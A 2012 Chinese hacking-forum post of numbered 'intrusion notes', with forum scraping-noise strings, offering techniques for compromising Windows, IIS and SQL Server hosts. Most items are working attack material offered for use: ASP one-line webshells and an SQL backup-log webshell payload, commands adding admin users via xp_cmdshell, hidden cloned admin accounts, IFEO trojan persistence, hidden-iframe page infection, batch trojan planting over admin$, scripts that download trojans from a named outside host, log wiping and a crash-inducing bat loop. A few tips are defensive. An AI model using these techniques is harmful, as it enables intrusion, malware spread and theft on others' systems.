找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2041|回复: 0
打印 上一主题 下一主题

入侵渗透笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:13:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
" }1 b+ g4 V; G+ ecacls C:\windows\system32 /G hqw20:R
8 p( n' ?& n, I5 B/ L! O6 R1 ]思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
9 M& ~; F5 B# R0 _9 i恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
# h2 L5 m2 {% }  n6 P, R7 l1 {7 m  d8 ]0 B$ {
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。9 j. L, r2 s- I1 g' _" K
8 J( B  y- u! r
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。5 l3 ^: T; `9 z/ E$ k

8 P7 `; I- @' z% r/ }: T4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
- W$ ]7 c/ d* f- [7 M
1 ?# o! g, u; |" ^$ K, @5、利用INF文件来修改注册表& |8 n- Q& A) N) l9 X
[Version]7 i2 F+ B6 f* U, \9 P
Signature="$CHICAGO$"5 T6 Y6 g+ q4 u6 v3 I3 d
[Defaultinstall]& o$ z0 x7 r) ?' N5 d
addREG=Ating9 Y; [4 G# A8 j1 J5 c- x2 |4 |
[Ating]
1 y0 ~' ^& M; X- ^% r. qHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1") R% `  E0 F0 m/ Y) k8 ^, K
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
, t0 T& @% q7 M0 N* s  |2 mrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径  s/ j4 c2 O' \" M
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
5 p* D' u3 {. PHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU% [1 D' K3 O. d0 h
HKEY_CURRENT_CONFIG 简写为 HKCC
3 g# F3 I4 T& I, B0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值( O6 x6 D5 H4 S$ u. z# C
"1"这里代表是写入或删除注册表键值中的具体数据  e; v7 j; x6 m( y% O3 h
" |) ^' ]2 q$ I
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
) Y  a2 U4 O& p0 ]$ ?5 h$ R多了一步就是在防火墙里添加个端口,然后导出其键值
2 @% B5 @& [. ^! M3 [[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
. n9 |9 T4 x8 K6 X, h
4 Y& \7 N! X1 A9 }; t0 i7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽% ?# d+ p* T1 k# n
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
- C+ j4 v2 Z6 ^/ x7 w4 d* m# S7 @5 h2 \) h7 w" S+ @  c3 Z
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。* p: G- E' M, X+ H& G. w
: C0 W2 u2 X: |$ X$ `* G4 p& c
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,) e' \3 ?: _! ?! z
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。. N, r' ^6 R) G: D

9 I  c+ u2 X2 W% x( J6 ~10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”1 ~" ~* }" ^" U# H/ X
" U8 s5 J( {5 m- X3 X
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
8 ^0 ^  E+ l: H$ C& ]5 R用法:xsniff –pass –hide –log pass.txt6 I3 {6 O$ O' @: }4 K5 P1 B: T
% k! t: X. a) W" T. I! F7 ]- o
12、google搜索的艺术" h0 m9 A  L% ?
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
2 S+ Z( k8 K' ~, O0 Z3 v6 q/ j或“字符串的语法错误”可以找到很多sql注入漏洞。' U( c* e/ P0 m" H, Q. W6 [
9 _( l7 g: K% G& o. b3 B7 M
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
4 U. F# ]1 Y  l8 V- P- s- y! W; g* A/ P: g) a$ g" z
14、cmd中输入 nc –vv –l –p 19875 ^+ j4 h, _7 t6 ^- u2 \" \
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃; H& I; u: M3 A9 O& H/ l
% r5 o& @) V3 ?9 r  m$ O. @
15、制作T++木马,先写个ating.hta文件,内容为/ H- D% v( ^: u* l2 f  u4 n
<script language="VBScript">
, r( u4 S! o! \* r; {set wshshell=createobject ("wscript.shell" )
9 @1 ]  f) ^" u3 \a=wshshell.run("你马的名称",1): `- L) R$ P# ?: F1 G$ V, y  S
window.close" h9 @1 T& O5 o
</script>* N8 w, Z7 C8 [
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。9 }) W9 w# Z: J# V3 S3 H3 }
3 Y. _5 Z/ ?# F
16、搜索栏里输入6 F3 b3 U6 t% \& z0 {
关键字%'and 1=1 and '%'=': F- V+ Y- q, p" A
关键字%'and 1=2 and '%'='2 W" F. a0 E) D& w; W, C5 ?3 P
比较不同处 可以作为注入的特征字符& Q% ]3 J$ A/ u7 A

; q9 T% r6 I% [4 R0 `1 K7 _17、挂马代码<html>1 n/ a* a, R4 w
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>* B$ q) }$ L' `$ ]6 O4 [
</html>
5 L# w- C2 J$ i  n: U, p  |" \4 |( x) y1 ]
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
% J7 ^* @7 n% b. d% w8 Vnet localgroup administrators还是可以看出Guest是管理员来。
& Z4 c' e: b! Y( z8 X0 k8 l0 D+ G+ R/ q8 z9 z2 Y+ C/ F: `
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
5 d8 k- v5 B: T% c0 l0 q用法: 安装: instsrv.exe 服务名称 路径- V1 F$ I; V/ P; J- v% c2 _1 D
卸载: instsrv.exe 服务名称 REMOVE) h: l  G6 F8 z! E, Z' H1 L

" C& x0 L  z# i- w; s7 f# g9 P& Z" S  @1 Z
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
% |8 M5 G3 J1 ?$ u% x# s不能注入时要第一时间想到%5c暴库。# I' p+ Q, L% h0 ]$ I, h& `( E

8 E0 c- N2 {$ T+ O1 o8 N22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
; _* O- J. d% X7 @
7 L% l' @) c0 f  c7 r7 P4 _23、缺少xp_cmdshell时0 \* r/ w- A, [. R$ u
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'& U/ d" c: E7 T" T
假如恢复不成功,可以尝试直接加用户(针对开3389的)
% [: [  W) U  ?declare @o int
" c: Z4 x5 l6 X" D' aexec sp_oacreate 'wscript.shell',@o out
1 u. t. R$ G9 I' X- Oexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员! b0 C' u- G) i- v! }

6 T+ K( e7 G  t- @24.批量种植木马.bat/ e9 W4 ^' M0 i
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中+ `$ Q" g9 P8 O# m% ^% |
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
$ y* V+ E! O) S9 ^7 y$ n扫描地址.txt里每个主机名一行 用\\开头
- P. I5 t9 R) k7 x: n4 Y* G8 i# P+ e9 E
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。8 L- l& Y/ ^: f" ?
! B2 ~9 w& e) G+ S6 C! R
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
- e2 R2 o3 V% x% x% W, g将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.5 M7 p" P& q$ z6 ~4 B2 t
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马! z9 w+ S% v& N6 }/ @+ ~5 p: S6 _* n4 v
. R1 P3 z( Y0 t
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
0 C6 J9 z2 O# I) w8 d2 j然后用#clear logg和#clear line vty *删除日志7 |$ b7 ~, ?$ S1 k) T& ]% ?

! D! x0 c& H$ E: o6 @/ `5 v28、电脑坏了省去重新安装系统的方法
+ i( V. Y1 r8 L, K1 c1 J纯dos下执行,
+ G& H! Q2 s$ _+ f3 z. f' W( Nxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
4 }; I' H% t) C+ y* m2 s2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
+ P' K9 ~  p5 m5 f8 ^7 j% V
5 w+ h% W# K. r1 d5 b4 Y$ O29、解决TCP/IP筛选 在注册表里有三处,分别是:! T! w' J4 Z$ I
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
% N' M4 N! Z8 b% uHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
0 [6 l, B& k. _- A' iHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip" B; ^0 V! F. D% A
分别用1 h3 I) ]- e4 Z! o7 s! x
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
* Y; x/ v- `) vregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip' L, n  ~: B% ^. ^* A4 h' C7 d8 D
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip7 H- t9 s! k' [4 N# j" l
命令来导出注册表项7 J; u/ M+ b7 o& v9 _
然后把三个文件里的EnableSecurityFilters"=dword:00000001,7 @9 a" @+ _0 ~! X1 l
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用$ H' l0 B# `  o' I
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
6 |7 X4 Z5 t& h) G. L2 K% h, G
% |. T* P& R( R30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U* _- \3 ^! y2 U/ W+ K3 p6 K
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
( n( u# W1 R" [6 V( Z3 O( D4 J' H0 N% ?  |2 i
31、全手工打造开3389工具
8 d. V! x& q% c9 f2 p8 e打开记事本,编辑内容如下:
( {/ J$ D' [( l1 K0 becho [Components] > c:\sql
4 u/ u1 l8 s# _' j. P+ V* aecho TSEnable = on >> c:\sql
  E% {' w# ^6 [1 p: u& [+ n8 tsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q' B& W5 `' g( O+ h# ?+ h# T
编辑好后存为BAT文件,上传至肉鸡,执行- Y. I! T' B# I2 N) ^3 ]' M
2 c/ G6 X7 a& n$ W
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
0 r2 w6 w5 _+ |/ ?+ W! a
2 G9 L; W; v7 {33、让服务器重启
, o( c1 |( n8 X+ Z* ^1 B写个bat死循环:! |( U+ P9 c+ Q6 \
@echo off
6 C' X' C* {/ u& C:loop13 ]. [. e$ u$ z" O. i' }/ f. F
cls
% A8 ^5 W' ~7 b6 m- |* bstart cmd.exe' k1 q5 S9 l/ c. q! L5 ^
goto loop1. S* ?0 E) c/ X7 v: {/ p
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
; n/ ^; @  y, o
5 {7 r1 R( }- ~3 @+ \34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,' {% Y, s7 _5 |1 U' I
@echo off
% [/ O" n) Q) c0 T0 Zdate /t >c:/3389.txt
( W% C, h2 J/ J7 V' ltime /t >>c:/3389.txt4 D, A$ O% i, d' E/ z. n
attrib +s +h c:/3389.bat& t9 Z( F8 U# h: k
attrib +s +h c:/3389.txt
0 K% b& D) g4 d: S. [$ L  i  Y, x7 inetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
( J% ?) |/ R( E  l; p& L. T并保存为3389.bat
7 k# D8 W5 i! H. f% `打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
0 P  C& ]! O" d! \0 }- Z" r0 {: i8 Y2 O" e6 e
35、有时候提不了权限的话,试试这个命令,在命令行里输入:5 b, I3 S, N/ l" `1 Z: j: h" J
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)$ Z3 d: r! x5 k5 K
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。9 b8 Q2 h  u& t+ [
( P2 o9 U# u* x$ l3 |' l
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件4 p1 `& h- T5 o& U  x
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
# l5 I' V& a" `3 D+ h# Oecho 你的FTP账号 >>c:\1.bat //输入账号
3 T# J5 s4 |& D& i! |3 C3 H3 mecho 你的FTP密码 >>c:\1.bat //输入密码+ z' w2 Q3 y, Y1 J8 S& ^& ~1 q) ^
echo bin >>c:\1.bat //登入
5 L8 z& |& t/ k9 O2 O7 F% _echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么3 Z3 }( W4 j" |9 H* X* b: W/ U
echo bye >>c:\1.bat //退出5 C, E  t. q7 Y! s/ T' w2 n, V
然后执行ftp -s:c:\1.bat即可
# l/ g8 K7 \7 n6 w. v0 G. [
) J' M/ ^1 B* Q  X* I  j37、修改注册表开3389两法: o+ o& {; {  r( g9 q
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
3 y# p( B8 [2 C+ u, w- A5 ]4 Qecho Windows Registry Editor Version 5.00 >>3389.reg( u2 w8 ^3 m! S
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg# e) ]. ]) R" E3 d( f0 J1 Y
echo "Enabled"="0" >>3389.reg
8 R+ Z# u( ]$ e( @5 becho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
3 d9 f8 n: W9 G) hNT\CurrentVersion\Winlogon] >>3389.reg# Q; C* f9 p9 V9 Q- M
echo "ShutdownWithoutLogon"="0" >>3389.reg+ l6 S! S6 ]+ X. D% h  D* T* C$ i6 o9 A3 ?
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]  d. o  k$ w; |6 J1 v# s' L& ^
>>3389.reg
; A0 x' x# Y" becho "EnableAdminTSRemote"=dword:00000001 >>3389.reg6 E( H, Y! N, e: h1 l2 N+ o" E
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
; {/ ^) S3 T1 ~" X/ K. A2 w; l>>3389.reg
* X9 q8 W$ c* E$ L( B5 g/ _. Recho "TSEnabled"=dword:00000001 >>3389.reg
' W: W0 |7 c4 o- ?% R  P& oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg, a3 D% K7 v# w# w* u
echo "Start"=dword:00000002 >>3389.reg* I  E9 r. X5 Q/ ?- D" p+ o
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
# ]2 q4 [' P: T. ?>>3389.reg- k7 `7 X! I" n& e1 v/ l" ^
echo "Start"=dword:00000002 >>3389.reg
% p. e- O; ?" w( N: [echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg6 q3 T5 m5 g) m+ t! R1 n
echo "Hotkey"="1" >>3389.reg2 H7 L6 [- C" }; ^# Y( ?1 R
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
  U2 ~$ r, f3 @0 a* ^Server\Wds\rdpwd\Tds\tcp] >>3389.reg2 _: X7 R$ a1 ?
echo "PortNumber"=dword:00000D3D >>3389.reg
" P, B: f9 y5 b% e2 k: G( G  b% \echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
% c5 d1 O9 Q& {9 N  r# ?' z* AServer\WinStations\RDP-Tcp] >>3389.reg
0 u% j7 x' w4 [" A( F4 e4 O+ \' yecho "PortNumber"=dword:00000D3D >>3389.reg
8 D1 a5 o" q5 P" n8 d4 u把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
/ t  `0 o8 X9 j  f4 j(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)* {. ?& n; Q  P% ?0 j  v5 N5 Z
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
; w% m1 i' ^0 Z5 ?% I% i(2)winxp和win2003终端开启
, `, _" \& C$ ~( s. k用以下ECHO代码写一个REG文件:+ W1 c& @5 i  w9 K/ \
echo Windows Registry Editor Version 5.00>>3389.reg6 v/ P( X! l- ]3 \1 g$ Z( G5 k# ~" t
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- h. J- \% R- _0 IServer]>>3389.reg
9 y  t& e. n' kecho "fDenyTSConnections"=dword:00000000>>3389.reg' N0 M7 ~2 y5 I" A3 ^( q4 E+ l
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal" ]# t* A3 [9 j& ]
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
" [; q8 V, b  d! F$ Aecho "PortNumber"=dword:00000d3d>>3389.reg
4 U% B; S% N) h$ D& Y9 fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal! @' R# ~* Z9 F0 O$ I! d
Server\WinStations\RDP-Tcp]>>3389.reg. [5 l1 g% ~* W5 b6 |% L5 V9 o
echo "PortNumber"=dword:00000d3d>>3389.reg
* K, E7 A* J* }0 }3 q6 Y然后regedit /s 3389.reg del 3389.reg
2 ?7 }. T, ?3 |6 X$ q( x0 ]) ^& `XP下不论开终端还是改终端端口都不需重启
1 Q5 h8 Z+ ]3 E' _0 ]7 L
: r) E; k" T3 T38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃$ n1 X8 v9 x6 z( a/ f
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'5 D: M; n. M1 S: X# y* s$ C
: z& D8 w! x; T: f7 [( U: ~( W
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!. ]: i, q. _+ q; v/ S  E9 A
(1)数据库文件名应复杂并要有特殊字符
% N' H5 j8 P) P, `* W) O(2)不要把数据库名称写在conn.asp里,要用ODBC数据源3 K" r: G8 g0 _
将conn.asp文档中的
+ x5 H' g- p. m. a/ mDBPath = Server.MapPath("数据库.mdb")
9 S0 Z; T8 J- M& F% Tconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath6 b% [' n( k" {! a

# W+ j: n6 o+ e! ?( [! r修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
& ]* Y* @' {) v8 F+ [(3)不放在WEB目录里
7 Q% ~7 Y1 \; s! U2 f
9 b$ ?" m0 |% e6 t7 _2 r5 z40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
" A+ t- Q2 X, c! J/ i$ [$ @  N可以写两个bat文件
/ a1 o: I5 W8 ^! k@echo off
0 @  |" Q% I. L' [8 L$ c@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe0 U. u) _6 h$ O" O$ H/ l' B( j  H
@del c:\winnt\system32\query.exe; A; r7 ^+ c" ?0 w
@del %SYSTEMROOT%\system32\dllcache\query.exe
2 R9 J: ~1 h# {@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
/ f. `6 A" |* a6 N8 `- F, @- h) P" f+ \
@echo off
5 {% ]* H) @: Q# f6 t5 B- F@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe6 s$ [5 F; I8 t* c+ R
@del c:\winnt\system32\tsadmin.exe
9 n' J6 N8 c5 o@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex  l7 J3 {5 h8 w' ]( x: D
8 g& L7 l+ p" v3 k
41、映射对方盘符" J; Q, G! Q* S( A' a7 D
telnet到他的机器上,0 Y- `( H5 p; C8 ?% Z' f
net share 查看有没有默认共享 如果没有,那么就接着运行# Y( X, s% A3 y9 ^
net share c$=c:
( B3 a& S. ~+ J# V( ~5 |net share现在有c$$ F5 g7 e3 X  u# g# ^
在自己的机器上运行
1 K2 r) [& i2 Y1 i$ ~% S+ Inet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K& C9 K7 u3 K2 q

! ^7 u% `, K2 _. j42、一些很有用的老知识
5 W+ o' b: N3 U0 C- m$ a- L! itype c:\boot.ini ( 查看系统版本 )
% h& E/ G  l, r7 C2 p" |net start (查看已经启动的服务)) q0 X, S, C$ W2 Y* M
query user ( 查看当前终端连接 )* F' l' c4 W4 ~0 _% k. }
net user ( 查看当前用户 )
, j8 e+ `/ @- ~! R2 L4 Knet user 用户 密码/add ( 建立账号 ); l$ H$ s3 y! Y+ ^8 b& |7 j" B/ }
net localgroup administrators 用户 /add (提升某用户为管理员)
  S% P5 g9 v. z' |# Zipconfig -all ( 查看IP什么的 )
1 ^2 e& M8 I1 o: @5 l: S  `; o* k2 qnetstat -an ( 查看当前网络状态 )
, t6 ~2 V3 }8 z( T9 \findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
. Z4 A/ Y6 T0 t; ]9 ^$ _克隆时Administrator对应1F4+ K& Q& e0 t( b3 v
guest对应1F5* O' |6 ]" [3 r2 M1 ^: a
tsinternetuser对应3E81 w6 X6 {9 a& T8 x. M; g( Q" V

3 ?7 Z2 d$ [# ~. h7 b# N43、如果对方没开3389,但是装了Remote Administrator Service6 X- k, ~1 T4 O* I
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接/ v8 ]9 p1 {, X+ D! c
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息9 [: _. A0 L2 L7 r
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
" A- Z7 s# R! v& ^& ]/ p3 y) S8 n7 n" Q9 b1 z
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
+ H7 q. ^  r8 H: r/ X本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口), T9 H. M, @' x  O% s  G( f

8 m* S0 x5 u0 \8 K$ I/ H* i, X45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
* p' t# W& J; o) @7 Z0 `% Qecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
! `" w) e7 F2 R& [^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
3 {( V  H6 o5 iCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =( ~. P' B3 q0 [& N1 c
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs5 v- `6 V. o. w4 ^5 P5 X1 H/ z  ^, ~
(这是完整的一句话,其中没有换行符)
+ A" Y8 A# k$ l- S然后下载:; ^2 Z$ n/ V  z/ P  `, p
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
/ p! V8 E6 A4 }
3 X" |( C* r) h  n, M: F46、一句话木马成功依赖于两个条件:
, {; z( O7 f) C1、服务端没有禁止adodb.Stream或FSO组件! S5 X7 Y& J' c! j' M8 d6 X4 z" d! C
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。; B$ S4 b0 ^$ b+ h' `

; f5 e& S4 O7 q0 r47、利用DB_OWNER权限进行手工备份一句话木马的代码:6 L2 v: C3 ^! {2 i# G* P8 ?5 G
;alter database utsz set RECOVERY FULL--
2 @# v+ R7 |8 Z& f6 j+ v;create table cmd (a image)--
9 g* P: _; x6 {' v9 l3 P;backup log utsz to disk = 'D:\cmd' with init--* ^0 m7 V; J' u9 r
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--2 L$ M: J) C( q
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
0 D. P; K2 I' |7 q注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。+ I- V, l4 D2 `1 r8 U' k
/ Q$ Z3 z) E* x* u) I% |4 Y
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
( `8 q& i" ^. i0 p+ _8 g- J
  ~; r3 c8 S  r用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
7 N% D! E: ~. j所有会话用 'all'。2 t4 \, a. `3 n  |7 _- m
-s sessionid 列出会话的信息。0 S$ `1 h, B. `3 J
-k sessionid 终止会话。
7 e% c) w3 T5 n1 T1 d-m sessionid 发送消息到会话。" |% d& `: _' n- ~7 X; E; Z8 O

5 Z1 M) J4 D4 C: K: G2 kconfig 配置 telnet 服务器参数。0 m1 S- ~* ]' f- h% n0 S! }5 P

/ H& B( e) z# J, z& }8 u8 Wcommon_options 为:
2 T& m$ ^: M, p) ]  O* X+ G7 f4 z-u user 指定要使用其凭据的用户
! m& L' ~# d$ F8 o7 Q-p password 用户密码
6 P, Q) ?; s4 V" R
; c6 a, S0 }8 Z# }' ^! P* p) fconfig_options 为:
+ N7 P+ u' m7 p. Qdom = domain 设定用户的默认域
: y, X* A6 G; ]+ hctrlakeymap = yes|no 设定 ALT 键的映射
/ O" S' G6 o1 a: I, S2 rtimeout = hh:mm:ss 设定空闲会话超时值
1 W9 P  z- z6 H# Atimeoutactive = yes|no 启用空闲会话。) Y, W# P% M7 w' }! N
maxfail = attempts 设定断开前失败的登录企图数。3 W1 O$ p) V8 r9 V# o/ ~* Y
maxconn = connections 设定最大连接数。5 U" u/ l! P: V
port = number 设定 telnet 端口。; p' n2 ^2 z# a, ]9 c+ M6 y
sec = [+/-]NTLM [+/-]passwd
% K" h! V" U1 X8 ~4 n1 @; b! g设定身份验证机构
. \  J& Z! D' u  J/ W" }fname = file 指定审计文件名。
0 Q* b" l3 S+ x2 Vfsize = size 指定审计文件的最大尺寸(MB)。8 |- B) |6 E& ~) a% b
mode = console|stream 指定操作模式。
1 O+ `: s- ]- S. c2 g6 k9 ~auditlocation = eventlog|file|both0 Q5 x  v! Q+ j( [) l$ d
指定记录地点
$ _' t: c1 i/ W4 waudit = [+/-]user [+/-]fail [+/-]admin2 d" b2 M' h7 r% ^
. z0 E4 x$ a$ J' Y
49、例如:在IE上访问:0 X' d0 y7 I3 i7 T( Z
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
; Y1 h4 q& G7 Ahack.txt里面的代码是:# U0 E' s6 \& u4 S' h
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">. c0 h& l: n5 r5 ~! C' k
把这个hack.txt发到你空间就可以了!
7 I' P# W1 P9 n( O2 p! `# a这个可以利用来做网马哦!/ ~  B' Y1 M# B) Z

3 ^8 m- p* L0 S5 j# N- ]' f! ]50、autorun的病毒可以通过手动限制!
( D/ h# J2 O3 T: |4 J) {0 R3 i1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!( M; d7 ?/ u$ F4 w4 d& I
2,打开盘符用右键打开!切忌双击盘符~' y% h. v9 f/ ~* X$ v' d  f2 {5 h
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
- N$ q, E, d2 E) H) x7 Y1 ?6 C0 \6 T+ g0 a( B' i- Z" q
51、log备份时的一句话木马:0 A" @; j5 s- I
a).<%%25Execute(request("go"))%%25>4 H3 B" E6 t+ g
b).<%Execute(request("go"))%>. y! O* L6 K% b( c  ?: M
c).%><%execute request("go")%><%$ F1 R4 O, V5 D9 D, z8 ~# ?7 t, I$ L/ v
